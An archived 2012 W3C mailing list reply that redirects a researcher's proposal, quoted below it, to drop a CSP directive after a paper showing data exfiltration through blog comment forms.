public-web-security is the mailing list for the general security interest group. Discussions about CSP should take place on public-webappsec. Would you be willing to re-send your message to that list? Thanks! Adam On Thu, Jun 7, 2012 at 8:05 PM, Eric Chen <eric.chen@sv.cmu.edu> wrote: > Hello Everyone: > > I would like to propose the removal of 'frame-action' directive from CSP 1.1 > because it offers very little security guarantees from data exfiltration > attacks. We wrote a paper on this particular > topic: http://www.w2spconf.com/2012/papers/w2sp12-final11.pdf > > In summary, the attack works as follows: > 1. Alice has a blog that uses the 'form-action' directive to protect data > from being sent to evil.com > 2. The attacker creates a form that posts the user's data to the comment > section of a blog post. > 3. The attacker reads the blog post to extract the data > > We discovered that 40% of the Alexa top 1xx websites contain at least one > exfiltration channels without CSRF protection, which makes them susceptible > to this attack (yes, even with JavaScript disabled). > > -- > -Eric >Received on Friday, 8 June 2012 19:13:53 GMT
This archive was generated by hypermail 2.2.0+W3C-0.50 : Friday, 8 June 2012 19:13:53 GMT